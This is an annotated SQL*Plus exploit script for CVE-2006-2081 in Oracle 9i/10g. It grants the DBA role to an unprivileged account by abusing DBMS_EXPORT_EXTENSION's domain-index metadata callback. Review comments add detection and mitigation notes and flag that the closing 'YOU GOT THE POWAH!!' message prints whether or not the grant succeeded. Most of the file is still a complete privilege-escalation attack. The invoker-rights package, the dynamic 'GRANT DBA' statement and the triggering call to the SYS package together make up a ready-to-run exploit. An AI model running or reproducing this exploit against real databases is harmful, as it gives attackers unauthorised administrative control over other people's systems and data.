-- 
-- dbms_exp_ext.sql
--
--
-- Oracle dbms_export_extension exploit (any version)
-- 
-- Grants the DBA role to an unprivileged user
-- 
-- Tested on Oracle 10g - Release 10.2.0.1.0
--	    Oracle  9i - Release  9.2.0.2.0
-- 
--   REF:    http://www.securityfocus.com/bid/17699
--
--   AUTHOR: Andrea "bunker" Purificato
--           http://rawlab.mindcreations.com
--
--   DATE:   Copyright 2007 - Sun Feb  4 15:53:04 CET 2007
--
-- 
--
-- SQL*Plus session setup: enable server output, print the banner, then read
-- the name of the account that will receive the role grant.
set serveroutput on;
prompt [+] dbms_exp_ext.sql exploit (CVE-2006-2081)
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
prompt 
-- Drop any earlier definition so that ACCEPT below always asks for a value.
undefine the_user;
-- NOTE(review): the value read here is a SQL*Plus substitution variable. It is
-- pasted as plain text into the dynamic GRANT statement in the package body
-- further down, and nothing in this script validates or quotes it.
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
prompt
prompt [-] Wait...

-- Package specification created in the schema of the connected user.
-- AUTHID CURRENT_USER declares the package with invoker rights, so its body
-- runs with the privileges of the caller instead of those of the owner.
-- The single function uses the name and argument types of the ODCI
-- index-metadata callback, which is the routine the export code looks up
-- when asked for the metadata of a domain index.
-- Detection note: a package outside SYS that declares ODCIIndexGetMetadata
-- and is not attached to any real index type is worth a look in a review of
-- recently created objects.
CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS
FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, b VARCHAR2,
c VARCHAR2, d SYS.odcienv) RETURN NUMBER;
END;
/

prompt [-] Building evil package...

-- Package body: the callback ignores its four arguments and issues one role
-- grant through dynamic SQL.
-- SQL*Plus replaces the substitution variable with the text typed at the
-- ACCEPT prompt before the statement is sent to the server, so the stored
-- source contains the literal account name.
-- Because the package is invoker-rights, the grant only succeeds when the
-- caller already holds the right to grant DBA. The script relies on the
-- SYS-owned export package calling this function (see the anonymous block
-- below), which is the behaviour tracked as CVE-2006-2081.
-- Detection note: auditing of role grants and a periodic comparison of
-- DBA_ROLE_PRIVS against the expected list of DBA grantees would surface the
-- effect of this statement.
CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS
FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, b VARCHAR2,
c VARCHAR2, d SYS.odcienv) RETURN NUMBER IS
-- Run in a separate transaction so the COMMIT below is permitted regardless
-- of the state of the transaction of the caller.
PRAGMA AUTONOMOUS_TRANSACTION;
    BEGIN
	EXECUTE IMMEDIATE 'GRANT DBA TO &the_user';
	-- GRANT is DDL and commits implicitly in Oracle, so this COMMIT looks
	-- redundant. The return value 1 is a constant and carries no metadata.
	COMMIT; RETURN(1);
    END;
END;
/

prompt [-] Finishing evil package...

-- Anonymous block that calls SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA
-- and names BUNKERPKG in the schema of the connected user as the type to
-- consult. The expressions built around USER only concatenate empty strings,
-- so they evaluate to the current user name.
-- NOTE(review): presumably the arguments are index name, index schema, type
-- name, type schema, version, an OUT flag and a flags value. Confirm against
-- the package specification of the release under test.
-- The header lists 10.2.0.1.0 and 9.2.0.2.0 as the tested releases. A database
-- carrying the vendor fix for CVE-2006-2081 is expected to reject this call.
-- Mitigation notes: apply the vendor patch for CVE-2006-2081, and check
-- whether EXECUTE on DBMS_EXPORT_EXTENSION is granted to PUBLIC, since the
-- script needs that privilege together with CREATE PROCEDURE.
DECLARE
 -- Receives the sixth argument of the call. It is never read afterwards.
 PLS PLS_INTEGER;
 -- Receives the function result. It is never read afterwards.
 RET VARCHAR2(200);
BEGIN
 RET := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
    'A',''||user||'','BUNKERPKG',''||user||'','',PLS,0);
END;
/

-- Printed unconditionally. The script sets no WHENEVER SQLERROR handling and
-- never queries the role assignments, so this line appears even when the
-- preceding block failed and no grant took place.
prompt [-] YOU GOT THE POWAH!!
